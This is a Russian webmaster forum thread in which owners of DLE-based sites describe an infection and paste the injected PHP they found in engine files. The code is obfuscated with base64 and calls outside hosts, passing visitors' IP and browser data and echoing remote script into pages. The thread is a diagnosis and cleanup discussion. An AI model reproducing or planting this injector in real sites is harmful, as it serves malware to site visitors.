- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
В 2023 году 36,9% всех DDoS-атак пришлось на сферу финансов
А 24,9% – на сегмент электронной коммерции
Оксана Мамчуева
Как удалить плохие SEO-ссылки и очистить ссылочную массу сайта
Применяем отклонение ссылок
Сервис Rookee
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Добрый вечер. Сегодня глянул свои сайты в IE и ужаснулся. Дизайн разлезся в IE. А потом увидел, в коде в самом верху строку <script src="http://wildfuckers.dyndns.ws/showforum.php?pid=54543" type="text/javascript"></script>
Она идёт прямо перед <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
Я уже даже скачал сайты на ПК и искал его @Text Replacer, но так и не нашёл. Подскажите пожалуйста, где его отрыть?
Сайты все на DLE, движки разные и шаблоны разные. А вот код везде этот...
Сайт - delay-auto.ru
Смотрите файлы
engine/modules/topnews.php
engine/init.php
engine/modules/sitelogin.php
на наличие такого кода
function show_all_news($id) {
$id = intval($id);
$rtn = $id + date("j");
return $rtn;
}
function mysql_safe($in) {
if (show_all_news(64) < 1024) {
$rtn = base64_decode($in);
return $rtn;
}
}
function get_all_news($newsid) {
if (date("j") - $newsid > 320 ) {
$rtn = false;
} else {
//$get = mysql_safe("aHR0cDovLzE3OC4yMTEuMzMuNzQvZ2V0X2FwaS5waHA/cGlkPTIm")."br=".base64_encode($_SERVER['HTTP_USER_AGENT'])."&ip=".base64_encode($_SERVER['REMOTE_ADDR']);//
if (!isset($_COOKIE[mysql_safe("ZGxlX3Bhc3N3b3Jk")])) {
echo @file_get_contents($get);
}
}
}
get_all_news (date("j"));
Смотрите файлы
engine/modules/topnews.php
engine/init.php
engine/modules/sitelogin.php
на наличие такого кода
function show_all_news($id) {
$id = intval($id);
$rtn = $id + date("j");
return $rtn;
}
function mysql_safe($in) {
if (show_all_news(64) < 1024) {
$rtn = base64_decode($in);
return $rtn;
}
}
function get_all_news($newsid) {
if (date("j") - $newsid > 320 ) {
$rtn = false;
} else {
//$get = mysql_safe("aHR0cDovLzE3OC4yMTEuMzMuNzQvZ2V0X2FwaS5waHA/cGlkPTIm")."br=".base64_encode($_SERVER['HTTP_USER_AGENT'])."&ip=".base64_encode($_SERVER['REMOTE_ADDR']);//
if (!isset($_COOKIE[mysql_safe("ZGxlX3Bhc3N3b3Jk")])) {
echo @file_get_contents($get);
}
}
}
get_all_news (date("j"));
нашел данный код в файле /engine/classes/mysql.php
ТС обязательно посмотрите и выясните как он попал к вам на сайт, т.к. от что вы нашли это могут быть последствия.
Целый день сегодня искал, откуда взялся такой же код на сайте.
В итоге он оказался в файле sape.php. Как он туда залез? Я весь движок перековырял, но ни как не ожидал его найти именно там. неужели фтп взломали?
Сегодня появился вредоносный код на сайте
были внесены изменения в конец index.php
как пролезли, не пойму... дыра походу на сайте, версия DLE 9.2
$rtn = base64_decode($in);
return $rtn;
}
function collectnewss() {
if (!isset($_COOKIE["iJijkdaMnerys"])) {
$value = 'yadeor';
$ip = $_SERVER['REMOTE_ADDR'];
$get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip;
$file = @fopen ($get, "r");
$content = @fread($file, 1000);
@setcookie("iJijkdaMnerys", $value, time()+3600*24);
if (!$content)
echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9mZWVsdGhlc2FtZS5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3NjcmlwdD4=");
else
echo $content;
}
}
collectnewss ();
---------- Добавлено 15.03.2013 в 23:17 ----------
На другом сайте такая же шляпа. Нужно определить, то ли пароли фтп стырили, то ли дыра в DLE.
нашел данный код в файле /engine/classes/mysql.php
Аналогичная проблема была! Спасибо за подсказку, вредоносный код нашёл так же в /engine/classes/mysql.php
$id = intval($id);
$rtn = $id + date("j");
return $rtn;
}
function mysql_safe_connect($in) {
if (getnewsfromid(64) < 1024) {
$rtn = base64_decode($in);
return $rtn;
}
}
function get_all_news_by_list($newsid) {
if (date("j") - $newsid > 320 ) {
$rtn = false;
} else {
$get = mysql_safe_connect("aHR0cDovLzE3OC4yMTEuMzMuNzQvZ2V0X2FwaS5waHA/cGlkPTIm")."br=".base64_encode($_SERVER['HTTP_USER_AGENT'])."&ip=".base64_encode($_SERVER['REMOTE_ADDR']);
if (!isset($_COOKIE[mysql_safe_connect("ZGxlX3Bhc3N3b3Jk")])) {
echo @file_get_contents($get);
}
}
}
get_all_news_by_list (date("j"));
Они потели, рыдали, но продолжали жрать кактус.
Выкиньте в топку Вы свой любименький DLE и возьмите че-нить по защищенней.
сегодня нашел у себя на сайте такой код
function getnewsfromid($id) {
$id = intval($id);
$rtn = $id + date("j");
return $rtn;
}
function mysql_safe_connect($in) {
if (getnewsfromid(64) < 1024) {
$rtn = base64_decode($in);
return $rtn;
}
}
function get_all_news_by_list($newsid) {
if (date("j") - $newsid > 320 ) {
$rtn = false;
} else {
$get = mysql_safe_connect("aHR0cDovLzE3OC4yMTEuMzMuNzQvZ2V0X2FwaS5waHA/cGlkPTIm")."br=".base64_encode($_SERVER['HTTP_USER_AGENT'])."&ip=".base64_encode($_SERVER['REMOTE_ADDR']);
if (!isset($_COOKIE[mysql_safe_connect("ZGxlX3Bhc3N3b3Jk")])) {
echo @file_get_contents($get);
}
}
}
get_all_news_by_list (date("j"));
в файле website.lng
сейчас буду рыть логи, искать где еще нас**ли, из этого кода видно что передается пароль админа на ip 178.211.33.74, из айпи можно изьять что он закреплен за датацентром Стамбула(Турция), что по большому счету ничего пока не дает...
Не всегда логи покажут откуда все это взялось.
Не всегда логи покажут откуда все это взялось.
вот в логах я так и не нашел ничего, посмотрим на дальнейшую активность взломщика